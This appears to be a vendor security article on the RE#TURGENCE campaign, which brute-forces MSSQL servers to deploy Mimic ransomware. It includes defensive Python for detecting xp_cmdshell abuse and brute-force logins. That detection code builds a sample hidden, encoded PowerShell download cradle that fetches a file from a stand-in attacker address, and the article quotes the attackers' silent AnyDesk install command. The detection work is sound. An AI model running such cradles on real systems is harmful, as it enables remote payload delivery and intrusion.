Threat actors are exploiting poorly configured Microsoft SQL (MSSQL) database servers and using the AnyDesk remote desktop tool to deploy Mimic ransomware.
Security researchers dubbed this ransomware campaign RE#TURGENCE.
Mimic ransomware attacks on MSSQL servers explained
According to security researchers, the attacks followed a series of steps:
Obtain initial access through brute force
The attackers first brute-force the credentials of an MSSQL server that is reachable from the internet. Once logged in, they use the xp_cmdshell extended stored procedure to run operating-system commands from within SQL Server.
xp_cmdshell is disabled by default and should stay disabled, especially on servers that are publicly exposed: with it enabled, a compromised database login is effectively a shell on the host.
Run an encoded PowerShell command
If xp_cmdshell is available, the attackers run a base64-encoded PowerShell command that downloads a file (189Jt) from a remote server.
Obfuscated Cobalt Strike payload deployment
To deploy the Cobalt Strike payload, the attackers use a sequence of PowerShell scripts and reflective in-memory loading, injecting the payload into the Windows-native process SndVol.exe so that nothing has to be written to disk as an executable.
AnyDesk remote desktop app download
The next step is to install AnyDesk with the command c:\ad.exe --install c:\"program files (x86)"\ --silent. After adding a new user to the local Administrators group, the attackers use the AnyDesk session to:
- download Mimikatz, to dump clear-text credentials from memory
- download Advanced Port Scanner, to map the network and the domain
Lateral movement to other devices
The attackers then use Advanced Port Scanner together with the credentials obtained through Mimikatz to compromise other endpoints, moving laterally across the network.
Mimic ransomware deployment
For this step the attackers used AnyDesk again, this time to deliver the Mimic ransomware, which then located and encrypted the targeted files.
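The chain above leaves two recognisable traces on the victim host: the SQL Server ERRORLOG records the moment xp_cmdshell is switched on, and process-creation telemetry (Sysmon Event ID 1 or Windows Security event 4688) shows sqlservr.exe spawning cmd.exe or powershell.exe with an -EncodedCommand argument. The Python below is an added example written for this article, not code from the researchers, from Heimdal or from the attackers. It decodes such an argument (PowerShell's -EncodedCommand is base64 over the UTF-16LE script text) and flags the download-cradle stage. The sample ERRORLOG lines, the process event, the paths and the address 203.0.113.5 are constructed for the example; only the file name 189Jt comes from the write-up.

```python
import base64
import re
import shlex

# Typical PowerShell download-cradle fragments (the stage that fetches the next payload).
CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression|Net\.WebClient",
    re.I,
)
SQL_PARENT = re.compile(r"(^|\\)sqlservr\.exe$", re.I)
SHELLS = re.compile(r"(^|\\)(cmd|powershell|pwsh)\.exe$", re.I)
# Message SQL Server writes to its ERRORLOG when sp_configure flips xp_cmdshell on.
XP_CMDSHELL_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell's -EncodedCommand encoding: base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16le")


def extract_encoded_argument(cmdline: str):
    """Return the base64 blob following -e/-enc/-EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of 'EncodedCommand', so the
    check is prefix-based rather than an exact match on '-enc'.
    """
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens[:-1]):
        if tok and tok[0] in "-/":
            name = tok[1:].lower()
            if name and "encodedcommand".startswith(name):
                return tokens[i + 1]
    return None


def analyze_process_event(parent_image: str, image: str, cmdline: str):
    """Tag one process-creation event (ParentImage / Image / CommandLine fields)."""
    findings = []
    # xp_cmdshell runs its commands as a direct child of the SQL Server service process.
    if SQL_PARENT.search(parent_image) and SHELLS.search(image):
        findings.append("xp_cmdshell_shell_spawn")
    enc = extract_encoded_argument(cmdline)
    if enc is not None:
        findings.append("encoded_powershell")
        try:
            script = decode_encoded_command(enc)
        except (ValueError, UnicodeDecodeError):
            script = ""  # not valid base64/UTF-16LE: keep only the encoded_powershell finding
        if CRADLE.search(script):
            findings.append("download_cradle")
    return findings


def xp_cmdshell_enabled_events(errorlog_lines):
    """Return the ERRORLOG lines that show xp_cmdshell being enabled."""
    return [line for line in errorlog_lines if XP_CMDSHELL_ON.search(line)]


# --- Constructed sample telemetry (not from a real incident) ---
# Stage-2 script as an attacker would encode it; 203.0.113.5 is a documentation-range
# address standing in for the attacker's download server.
SAMPLE_SCRIPT = (
    "(New-Object Net.WebClient).DownloadFile("
    "'http://203.0.113.5/189Jt','C:\\Users\\Public\\189Jt')"
)
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_CMDLINE = f"cmd.exe /c powershell -nop -w hidden -enc {SAMPLE_ENC}"
SAMPLE_PARENT = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_IMAGE = r"C:\Windows\System32\cmd.exe"
SAMPLE_ERRORLOG = [
    "2024-01-09 10:15:30.00 spid10s     Starting up database 'tempdb'.",
    "2024-01-09 10:16:02.41 spid54      Configuration option 'xp_cmdshell' changed from 0 to 1. "
    "Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    print(analyze_process_event(SAMPLE_PARENT, SAMPLE_IMAGE, SAMPLE_CMDLINE))
    print(decode_encoded_command(SAMPLE_ENC))
    print(xp_cmdshell_enabled_events(SAMPLE_ERRORLOG))
```

In production the two signals belong together: a single xp_cmdshell configuration change is already worth a ticket on a database server that never needed it, and a shell child of sqlservr.exe carrying an encoded command with a download cradle is the point at which the host should be isolated, before the AnyDesk stage that follows.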
Who's vulnerable to the Mimic ransomware attacks on MSSQL servers
The financially motivated Turkish threat actors behind the campaign targeted Microsoft SQL servers worldwide. Their victims are businesses based in the European Union, the United States and Latin America.
The one thing they all have in common is poorly secured Microsoft SQL servers.
In this case, there were two main, simple to avoid, issues:
- Exposing the MSSQL server to the internet with credentials weak enough to be brute-forced, which is how the attackers gained initial access.
- Leaving the xp_cmdshell procedure enabled, although attackers can easily use it to run commands on the operating system. xp_cmdshell is disabled by default, in line with the evergreen security principle "Turn off what you don't use".
How to prevent initial access through brute force attacks
To avoid becoming a victim of the RE#TURGENCE ransomware campaign, follow this shortlist of best practices against brute-force attacks:
- Enable multi-factor authentication
- Enforce a strong password policy
- Rate-limit login attempts, and block or lock out sources that keep failing
- Use Heimdal’s Next-Generation Antivirus & MDM Anti-Brute-Force to generate blocking rules for vulnerable ports and isolate compromised devices.
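As an added illustration of the rate-limiting item (example code written for this page, not Heimdal's product logic and not the researchers' code): a sliding-window count of failed MSSQL logins per source IP, run over SQL Server ERRORLOG lines of the kind written for error 18456. The log lines, the addresses 198.51.100.7 and 192.0.2.10 and the user names are constructed; the policy of 10 failures within 60 seconds is an assumed threshold.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Layout of the "Login failed" line SQL Server writes to its ERRORLOG on a bad
# password (error 18456). The sample lines below are constructed for this example.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[\d.]+)\]"
)


def parse_failures(lines):
    """Yield (timestamp, user, client_ip) for every failed-login line; other lines are ignored."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["ip"])


def brute_force_sources(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: timestamp at which it crossed the threshold}.

    Sliding window per source IP: once `threshold` failures fall inside
    `window`, the IP is flagged. This is the rule a firewall or the MSSQL
    host should enforce as a block, not only as an alert.
    """
    recent = defaultdict(deque)
    flagged = {}
    for ts, _user, ip in parse_failures(lines):
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that aged out of the window
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


# --- Constructed sample ERRORLOG (not from a real host) ---
def _line(ts, user, ip):
    stamp = f"{ts:%Y-%m-%d %H:%M:%S.%f}"[:-4]  # ERRORLOG prints two fractional digits
    return (f"{stamp} Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {ip}]")


START = datetime(2024, 1, 9, 10, 15, 0)
# 12 failures against 'sa' from one address within 22 seconds: a brute-force run.
SAMPLE_LOG = [_line(START + timedelta(seconds=2 * i), "sa", "198.51.100.7") for i in range(12)]
# Two failures five minutes apart from another address: a user mistyping a password.
SAMPLE_LOG += [_line(START + timedelta(seconds=5), "reporting", "192.0.2.10"),
               _line(START + timedelta(minutes=5), "reporting", "192.0.2.10")]
SAMPLE_LOG.append("2024-01-09 10:15:03.00 spid10s     Starting up database 'tempdb'.")

if __name__ == "__main__":
    for ip, when in brute_force_sources(SAMPLE_LOG).items():
        print(f"block {ip}: {10} failures within 60s as of {when}")
```

The same logic applied to live ERRORLOG or to the Windows Application log (where SQL Server writes the same 18456 events) gives the blocking rule the list above asks for; a server that never needs logins from the internet should simply not have port 1433 reachable from it, which removes the brute-force surface entirely.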